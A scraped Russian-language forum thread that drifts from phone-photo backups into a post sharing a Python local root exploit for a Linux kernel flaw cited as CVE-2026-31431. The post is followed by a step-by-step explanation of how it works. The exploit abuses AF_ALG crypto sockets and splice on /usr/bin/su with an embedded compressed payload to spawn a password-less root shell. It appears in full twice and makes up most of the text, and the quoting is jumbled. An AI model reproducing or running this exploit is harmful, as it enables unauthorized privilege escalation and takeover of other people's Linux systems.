У меня нет ( не было и не будет) такого автомата.nvvosk писал(а): Ну на андроидном, как я написала выше - фотки уходят в облако автоматом, как только подсоединяешься к вайфаю.
Вот гораздо сложнее (точнее утомительнее) стирать их с телефона периодически
Почему? Гуглофотки - очень удобное хранилище. Уж точно проще их оттуда на комп забрать, чем с телефона...
Я не вижу разницы, если честно.
Я не отправляю фотки в облако вообще.nvvosk писал(а): А в чем разница между тем, что ты говоришь телефону - отправь фотки в облако и автоматической их туда отправкой?
Код: Выделить всё
#!/usr/bin/env python3
import os
import zlib
import socket
def hex_to_bytes(hex_string):
"""Converts a hex string into raw bytes."""
return bytes.fromhex(hex_string)
def trigger_exploit_chunk(file_descriptor, offset, chunk_data):
"""
Interacts with the Linux AF_ALG (Socket Crypto API) to perform
memory manipulation.
"""
# Create a socket using AF_ALG (38)
# SOCK_SEQPACKET (5)
sock = socket.socket(38, 5, 0)
# Bind to the AEAD (Authenticated Encryption with Associated Data) interface
# Specifically using AES-CBC with SHA256 HMAC
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
SOL_ALG = 279 # Socket option level for ALG
# Set cryptographic key and authentication tag lengths
# Using hex-decoded strings to represent raw memory structures
sock.setsockopt(SOL_ALG, 1, hex_to_bytes("0800010000000010" + "0" * 64))
# ALG_SET_AEAD_AUTHSIZE
sock.setsockopt(SOL_ALG, 5, None, 4)
# Accept the connection to initialize the transform
child_sock, _ = sock.accept()
# Total data length for the message
total_len = offset + 4
null_byte = hex_to_bytes("00")
# Send a crafted message with specific control data (CMSG)
# This is often used to trigger heap overflows or use-after-free
# conditions in the kernel's socket buffer.
child_sock.sendmsg(
[b"A" * 4 + chunk_data],
[
(SOL_ALG, 3, null_byte * 4), # ALG_SET_IV
(SOL_ALG, 2, b"\x10" + null_byte * 19), # ALG_SET_OP
(SOL_ALG, 4, b"\x08" + null_byte * 3), # ALG_SET_AEAD_ASSOCLEN
],
32768, # MSG_DONTWAIT
)
# Create a pipe to use splice() for zero-copy data movement
# This moves data from the target file into the socket to trigger the bug
pipe_read, pipe_write = os.pipe()
# Splice from the /usr/bin/su file into the pipe
os.splice(file_descriptor, pipe_write, total_len, offset_src=0)
# Splice from the pipe into the socket file descriptor
os.splice(pipe_read, child_sock.fileno(), total_len)
try:
# Attempt to receive data to finalize the operation
child_sock.recv(8 + offset)
except Exception:
# Ignore errors during the crash/overwrite phase
pass
# --- Execution Flow ---
# Open /usr/bin/su (a setuid binary) to use as a source/target for splicing
su_file_fd = os.open("/usr/bin/su", os.O_RDONLY)
# Decompress the payload (hex-encoded zlib stream)
# This payload likely contains the shellcode or memory addresses needed for the exploit
payload = zlib.decompress(
hex_to_bytes(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
)
)
# Iterate through the payload in 4-byte increments, triggering the exploit logic
current_offset = 0
while current_offset < len(payload):
trigger_exploit_chunk(su_file_fd, current_offset, payload[current_offset : current_offset + 4])
current_offset += 4
# If successful, the kernel memory is patched, and 'su' can be called without a password
os.system("su")What is this code doing?Ion Tichy писал(а): Эй, линуксоиды!...
А в чем сложность? Подключить телефон к компу шнурком?
Ахренеть!!!Ion Tichy писал(а):What is this code doing?Ion Tichy писал(а): Эй, линуксоиды!...
1. Environment Preparation: It opens /usr/bin/su, a binary that normally requires a password.
2. Payload Extraction: It decompress a zlib-compressed hex string containing the binary payload used for the memory corruption.
3. The AF_ALG Bug: It creates a specialized socket (AF_ALG). By using sendmsg and setsockopt with specifically crafted headers, it interacts with the kernel's cryptographic buffers.
4. Splice Exploitation: It uses the os.splice system call to move data between the file and the socket. This is a common technique in kernel exploits to bypass certain memory protections or to trigger race conditions.
5. Privilege Escalation: The goal is to overwrite kernel structures (like the cred structure of the current process) to set the UID to 0 (root).
6. The "Win" Condition: Finally, it executes os.system("su"). If the exploit worked, the user will be dropped into a root shell without being prompted for a password.
Торвальд забанил русских кернел девелоперов, вот уже и результаты...Ion Tichy писал(а): Чт апр 30, 2026 12:15 pm Эй, линуксоиды!
Свежий атас атасище!
CVE-2026-31431
пользователь может получить рутовые права.
Пример хака на питоне:Код: Выделить всё
#!/usr/bin/env python3 import os import zlib import socket def hex_to_bytes(hex_string): """Converts a hex string into raw bytes.""" return bytes.fromhex(hex_string) def trigger_exploit_chunk(file_descriptor, offset, chunk_data): """ Interacts with the Linux AF_ALG (Socket Crypto API) to perform memory manipulation. """ # Create a socket using AF_ALG (38) # SOCK_SEQPACKET (5) sock = socket.socket(38, 5, 0) # Bind to the AEAD (Authenticated Encryption with Associated Data) interface # Specifically using AES-CBC with SHA256 HMAC sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) SOL_ALG = 279 # Socket option level for ALG # Set cryptographic key and authentication tag lengths # Using hex-decoded strings to represent raw memory structures sock.setsockopt(SOL_ALG, 1, hex_to_bytes("0800010000000010" + "0" * 64)) # ALG_SET_AEAD_AUTHSIZE sock.setsockopt(SOL_ALG, 5, None, 4) # Accept the connection to initialize the transform child_sock, _ = sock.accept() # Total data length for the message total_len = offset + 4 null_byte = hex_to_bytes("00") # Send a crafted message with specific control data (CMSG) # This is often used to trigger heap overflows or use-after-free # conditions in the kernel's socket buffer. child_sock.sendmsg( [b"A" * 4 + chunk_data], [ (SOL_ALG, 3, null_byte * 4), # ALG_SET_IV (SOL_ALG, 2, b"\x10" + null_byte * 19), # ALG_SET_OP (SOL_ALG, 4, b"\x08" + null_byte * 3), # ALG_SET_AEAD_ASSOCLEN ], 32768, # MSG_DONTWAIT ) # Create a pipe to use splice() for zero-copy data movement # This moves data from the target file into the socket to trigger the bug pipe_read, pipe_write = os.pipe() # Splice from the /usr/bin/su file into the pipe os.splice(file_descriptor, pipe_write, total_len, offset_src=0) # Splice from the pipe into the socket file descriptor os.splice(pipe_read, child_sock.fileno(), total_len) try: # Attempt to receive data to finalize the operation child_sock.recv(8 + offset) except Exception: # Ignore errors during the crash/overwrite phase pass # --- Execution Flow --- # Open /usr/bin/su (a setuid binary) to use as a source/target for splicing su_file_fd = os.open("/usr/bin/su", os.O_RDONLY) # Decompress the payload (hex-encoded zlib stream) # This payload likely contains the shellcode or memory addresses needed for the exploit payload = zlib.decompress( hex_to_bytes( "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3" ) ) # Iterate through the payload in 4-byte increments, triggering the exploit logic current_offset = 0 while current_offset < len(payload): trigger_exploit_chunk(su_file_fd, current_offset, payload[current_offset : current_offset + 4]) current_offset += 4 # If successful, the kernel memory is patched, and 'su' can be called without a password os.system("su")